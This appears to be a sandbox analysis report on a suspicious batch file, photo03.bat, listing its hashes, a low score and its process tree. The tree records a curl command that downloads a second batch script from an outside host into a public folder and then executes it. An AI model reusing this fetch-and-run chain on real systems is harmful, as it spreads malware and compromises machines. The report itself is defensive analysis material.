376bcb8b4281674c67a8e4cc273fa1abdf37a58572580ebf5d939642b4938e33 | Triage

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
13/07/2023, 05:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

photo03.bat
Size

1.7MB
MD5

9083521bc239937f620c005ce8856575
SHA1

ccb14ab3abba00970b58cb4303c66c94187bb23c
SHA256

09d84e609bdfc78918051aa4f77bcd5eb76ad0068abb10bc1730c1cb2eabae7a
SHA512

e3369c4fb22af0d87449406cba0ad1ad904113c6d39627b0aa22c5af4d9b69714734586482d184e7c996bd76a490016f2e5b890b7fb943d1b331f5c13bc64495
SSDEEP

192:tbbbbbbvbbbbbbb+bbbFbbbbbbbbbbbobbxkbbbbbbbbbbbbbbbbbbbbbbbbbbbz:jeeeeeeeeeeeeeeeeeeee6

Score

1^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2656 wrote to memory of 1648	2656	cmd.exe	29
PID 2656 wrote to memory of 1648	2656	cmd.exe	29
PID 2656 wrote to memory of 1648	2656	cmd.exe	29
PID 2656 wrote to memory of 2468	2656	cmd.exe	30
PID 2656 wrote to memory of 2468	2656	cmd.exe	30
PID 2656 wrote to memory of 2468	2656	cmd.exe	30

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\photo03.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\system32\cmd.exe
  cmd /c curl https://sealingshop.click/bat/chien -o "C:\\Users\\Public\\memss.bat"
  2⤵
  PID:1648
- C:\Windows\system32\cmd.exe
  cmd /c C:\\Users\\Public\\memss.bat
  2⤵
  PID:2468

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads